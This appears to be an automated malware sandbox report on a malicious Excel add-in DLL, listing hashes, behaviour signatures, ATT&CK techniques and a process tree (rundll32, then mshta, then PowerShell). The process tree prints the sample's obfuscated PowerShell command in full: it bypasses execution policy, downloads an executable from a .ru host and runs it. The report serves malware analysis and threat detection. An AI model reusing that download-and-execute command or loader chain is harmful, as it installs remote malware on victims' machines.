73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71

General

Target

0708_5355150121.xll.dll
Size

23KB
MD5

41e0318dfdb1c180a375a7efc712649e
SHA1

f0c230010c7b85544c25879d4daf74479360e1bc
SHA256

73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
SHA512

b20ec32ba9f7269deda4f70e655bb7a105dde896524bfd9c788605f2a0a26bc3bc7ddceed93c4f7b14404a65107647a9b9840c8adec32c12d92138b69805cc17

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

10 1336 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

416 3852 WerFault.exe mshta.exe
Modifies registry class 1 IoCs

Processes:

rundll32.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings rundll32.exe

flow	pid	process
10	1336	rundll32.exe

pid	pid_target	process	target process
416	3852	WerFault.exe	mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	rundll32.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe
416	WerFault.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 416 WerFault.exe
Token: SeBackupPrivilege 416 WerFault.exe
Token: SeDebugPrivilege 416 WerFault.exe

description	pid	process
Token: SeRestorePrivilege	416	WerFault.exe
Token: SeBackupPrivilege	416	WerFault.exe
Token: SeDebugPrivilege	416	WerFault.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

rundll32.exerundll32.exemshta.exe

description	pid	process	target process
PID 808 wrote to memory of 1336	808	rundll32.exe	rundll32.exe
PID 808 wrote to memory of 1336	808	rundll32.exe	rundll32.exe
PID 808 wrote to memory of 1336	808	rundll32.exe	rundll32.exe
PID 1336 wrote to memory of 3852	1336	rundll32.exe	mshta.exe
PID 1336 wrote to memory of 3852	1336	rundll32.exe	mshta.exe
PID 1336 wrote to memory of 3852	1336	rundll32.exe	mshta.exe
PID 3852 wrote to memory of 184	3852	mshta.exe	powershell.exe
PID 3852 wrote to memory of 184	3852	mshta.exe	powershell.exe
PID 3852 wrote to memory of 184	3852	mshta.exe	powershell.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\0708_5355150121.xll.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\0708_5355150121.xll.dll,#1
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\res32.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 1356
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
4⤵
PID:184

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\res32.hta
MD5
71999a9d2f15e164c9b1fa926aa6444b

SHA1
c1fbd2b6458b474a208b6cc710951940c9290e5c

SHA256
da92436d2bbcdef52b11ace6e2e063e9971cefc074d194550bd425305c97cdd5

SHA512
298eaab6d157e81bb738b1605285a0d14b05ae3656f1bbf72c4921c78b74be7048b6744144469cb4ef48f4d4d233f794c366f192765a4f193c48b2de2eff4c27

Download Submit
memory/1336-114-0x0000000000000000-mapping.dmp

Download
memory/3852-115-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing